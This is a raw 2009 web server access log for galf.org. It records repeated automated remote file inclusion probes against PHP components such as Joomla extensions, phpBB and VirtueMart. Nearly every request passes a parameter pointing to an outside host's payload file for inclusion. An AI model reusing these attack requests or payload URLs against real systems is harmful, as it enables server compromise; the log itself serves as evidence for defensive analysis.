61.100.186.87 - - [07/Sep/2009:05:02:26 -0700] "GET /skin/uks_gallery_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.186.87 - - [07/Sep/2009:05:02:26 -0700] "GET /logs/access.log//skin/uks_gallery_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.186.87 - - [07/Sep/2009:05:02:26 -0700] "GET /logs//skin/uks_gallery_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [07/Sep/2009:05:02:36 -0700] "GET /logs/access.log///config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.184.252.3 - - [07/Sep/2009:05:02:43 -0700] "GET //config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.184.252.3 - - [07/Sep/2009:05:02:44 -0700] "GET /logs///config.php?path_to_root=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:10 -0700] "GET /citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:10 -0700] "GET /logs//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:13 -0700] "GET /logs/access.log//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.100.186.87 - - [07/Sep/2009:05:03:14 -0700] "GET /logs//skin/uks_gallery_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.186.87 - - [07/Sep/2009:05:03:14 -0700] "GET /logs/access.log%20%20//skin/uks_gallery_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.100.186.87 - - [07/Sep/2009:05:03:14 -0700] "GET /skin/uks_gallery_v3010/setup.php?dir=http://golden-j.com/icon1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:48 -0700] "GET /citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:48 -0700] "GET /logs//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:48 -0700] "GET /logs/access.log//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:49 -0700] "GET /citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:49 -0700] "GET /logs//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:49 -0700] "GET /logs/access.log//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:52 -0700] "GET /citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:52 -0700] "GET /logs/access.log//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:03:52 -0700] "GET /logs//citywriter/head.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
99.198.106.178 - - [07/Sep/2009:05:03:56 -0700] "GET /modules/mod_calendar.php?absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [07/Sep/2009:05:03:56 -0700] "GET /logs/access_090720.log%20%20//modules/mod_calendar.php?absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [07/Sep/2009:05:03:56 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [07/Sep/2009:05:05:57 -0700] "GET /logs/access_090720.log//modules/mod_calendar.php?absolute_path=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.123.177 - - [07/Sep/2009:05:07:41 -0700] "GET /logs/access.log///modules/My_eGallery/index.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.206.123.177 - - [07/Sep/2009:05:07:41 -0700] "GET /logs///modules/My_eGallery/index.php?basepath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:10:34 -0700] "GET /cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:10:34 -0700] "GET /logs/access.log%20%20//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:10:34 -0700] "GET /logs//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:11:49 -0700] "GET /cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:11:49 -0700] "GET /logs//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:11:49 -0700] "GET /logs/access.log//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:12:07 -0700] "GET /logs/access.log//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:12:07 -0700] "GET /cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:12:07 -0700] "GET /logs//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:12:24 -0700] "GET /cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:12:24 -0700] "GET /logs/access.log//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:12:24 -0700] "GET /logs//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:13:01 -0700] "GET /cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:13:01 -0700] "GET /logs/access.log//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
79.174.78.83 - - [07/Sep/2009:05:13:04 -0700] "GET /logs//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [07/Sep/2009:05:14:40 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [07/Sep/2009:05:14:40 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "galf.org"
121.125.74.87 - - [07/Sep/2009:05:14:43 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [07/Sep/2009:05:15:33 -0700] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:05:15:33 -0700] "GET /logs/access_090309.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:05:15:33 -0700] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:05:15:35 -0700] "GET /logs/access_090302.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:05:15:56 -0700] "GET /logs/access_090302.log%20%20/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:05:17:41 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:05:17:41 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:05:17:51 -0700] "GET /logs/access_090518.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:05:18:18 -0700] "GET /logs/access_090323.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:05:18:25 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:18:28 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:18:28 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:18:34 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:18:34 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:18:34 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:19:11 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:19:11 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:19:11 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
121.125.74.87 - - [07/Sep/2009:05:19:41 -0700] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://dancok.wen.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.146.119.209 - - [07/Sep/2009:05:21:54 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:21:54 -0700] "GET /logs/access_090518.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:21:58 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:22:16 -0700] "GET /logs/access_090323.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:05:23:37 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.25.226 - - [07/Sep/2009:05:23:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.25.226 - - [07/Sep/2009:05:23:37 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:23:55 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:23:55 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:24:12 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:24:12 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
94.136.37.141 - - [07/Sep/2009:05:24:12 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
69.175.25.226 - - [07/Sep/2009:05:26:09 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:05:26:10 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:05:26:10 -0700] "GET /logs/access_090323.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.25.226 - - [07/Sep/2009:05:26:20 -0700] "GET /logs/access_090518.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:29:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:29:45 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:29:45 -0700] "GET /logs/access_090608.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:29:49 -0700] "GET /logs/access_090525.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:29:53 -0700] "GET /logs/access_090727.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:29:54 -0700] "GET /logs/access_090601.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:02 -0700] "GET /logs/access_090713.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:02 -0700] "GET /logs/access_090622.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:03 -0700] "GET /logs/access_090427.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:03 -0700] "GET /logs/access_090504.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:21 -0700] "GET /logs/access_090511.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:30 -0700] "GET /logs/access_090518.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:34 -0700] "GET /logs/access_090413.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:34 -0700] "GET /logs/access_090831.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:34 -0700] "GET /logs/access_090420.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.186 - - [07/Sep/2009:05:30:41 -0700] "GET /logs/access_090803.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:31:06 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:31:06 -0700] "GET /logs/access_090202.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:31:06 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [07/Sep/2009:05:31:27 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [07/Sep/2009:05:31:27 -0700] "GET /e404.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [07/Sep/2009:05:31:31 -0700] "GET /logs/access_090309.log/e404.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [07/Sep/2009:05:32:03 -0700] "GET /logs/access_090223.log/e404.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:32:59 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:32:59 -0700] "GET /logs/access_090323.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:05:32:59 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:05:33:34 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [07/Sep/2009:05:33:34 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.38.136.251 - - [07/Sep/2009:05:33:34 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.146.119.209 - - [07/Sep/2009:05:34:29 -0700] "GET /logs/access_090427.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [07/Sep/2009:05:35:11 -0700] "GET /logs/access_090309.log%20%20/e404.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [07/Sep/2009:05:35:30 -0700] "GET /logs/access_090223.log%20%20/e404.php?DOCUMENT_ROOT=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [07/Sep/2009:05:35:59 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.traceback-ip.eu/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
209.92.156.53 - - [07/Sep/2009:05:35:59 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.traceback-ip.eu/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
65.55.165.96 - - [07/Sep/2009:05:36:00 -0700] "GET /logs/access_090427.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:05:36:14 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://business.hongik.ac.kr/~business/bbs/data/gall/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
